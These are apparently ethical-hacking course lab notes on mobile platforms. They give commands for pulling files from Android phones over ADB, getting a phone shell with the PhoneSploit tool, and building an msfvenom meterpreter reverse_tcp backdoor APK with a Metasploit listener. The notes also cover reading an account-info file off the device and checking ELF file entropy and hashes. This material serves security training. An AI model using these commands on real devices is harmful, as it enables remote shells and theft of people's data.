17 - Hacking Mobile

Module 17 - Hacking Mobile Platforms

Download a file from Android device

ADB Tool

adb devices -l

# Connection Establish Steps
adb connect
adb devices -l
adb shell  

# Download a File from Android using ADB tool
adb pull /sdcard/log.txt C:\Users\admin\Desktop\log.txt 
adb pull sdcard/log.txt /home/mmurphy/Desktop


git clone https://github.com/aerosol-can/PhoneSploit
cd PhoneSploit
pip3 install colorama
python3 -m pip install colorama

python3 phonesploit.py

# Type 3 and Press Enter to Connect a new Phone OR Enter IP of Android Device
# Type 4, to Access Shell on phone

cd sdcard
cd Download

#Download File using PhoneSploit
9. Pull Folders from Phone to PC

#Enter the Full Path of file to Download

Check entropy and hash of elf file using ADB Tool

#Perform deep scan of the elf files and obtain the last 4 digits of SHA 384 hash of the file with highest entropy value

adb connect # Connection Establish Steps
adb shell  

#1. check elf file with highest entropy
ls sdcard/scan #check if there're .elf files
sudo adb pull /sdcard/scan #download entire dir including .elf files
ent -h #ent tool options, if we haven't it: apt install ent
ent first_file.elf #Entropy value 3.28412 bits, it has highest value of entropy.
ent second_file.elf #Entropy value 1.15679 bits

#2. check the last 4 digits of SHA 384
sha384sum --help
sha384sum first_file.elf
#select only the last 4 digits of hash.

Generating and Executing Payloads for Android

Setup Android

  • Open terminal, run su

  • Run ip addr add dev eth0

Generate Payload

  • msfvenom -p android/meterpreter/reverse_tcp --platform android -a dalvik LHOST= R > Desktop/Backdoor.apk R raw

  • Host the payload and run a listener on Kali

  • Type use exploit/multi/handler

  • Type set payload android/meterpreter/reverse_tcp

  • Type set LHOST

  • Start listener, type exploit -j -z

  • Browse link of file to start meterpreter session.

Exploit Execution

  • Open kali hosted link.

  • Download APK using es file downloader.

  • Install and run.

Exploit the Android Platform through ADB using PhoneSploit

  • cd Phonesploit

  • python3 -m pip install colorama

  • python3 phonesploit.py

  • 3


  • 4

  • pwd

  • cd sdcard

  • cd Download

  • pwd

  • cd sdcard

  • cd downloads

  • cat accnt-info.txt

Last updated